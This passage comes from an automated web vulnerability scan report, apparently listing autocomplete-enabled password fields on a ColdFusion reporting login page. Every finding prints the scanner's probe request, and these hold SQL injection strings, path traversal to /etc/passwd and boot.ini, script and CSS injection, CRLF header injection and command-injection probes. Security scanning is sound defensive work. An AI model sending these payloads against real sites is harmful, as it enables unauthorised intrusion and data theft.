Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=1%20ns=netsparker(0x000013)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=1%20ns=netsparker(0x000013)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.248. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.249. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=body%7Bx:expression(netsparker(0x000051))%7D HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=body%7Bx:expression(netsparker(0x000051))%7D" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.250. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.251. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.252. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-1+OR+1%3d1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+1%3d1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.253. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=//netsparker.com/n/n.css?0x00002B HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=//netsparker.com/n/n.css?0x00002B" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.254. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.255. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../boot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.256. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:28 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:28 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.257. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.258. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%2Bresponse.write(268409241-22)%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bresponse.write(268409241-22)%2B%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.259. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%27%22%20ns=%20netsparker(0x000010)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%27%22%20ns=%20netsparker(0x000010)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.260. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000011)%3C%2Fscript%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000011)%3C%2Fscript%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.261. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%26expr%20268409241%20-%202%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26expr%20268409241%20-%202%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.262. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.263. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.264. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

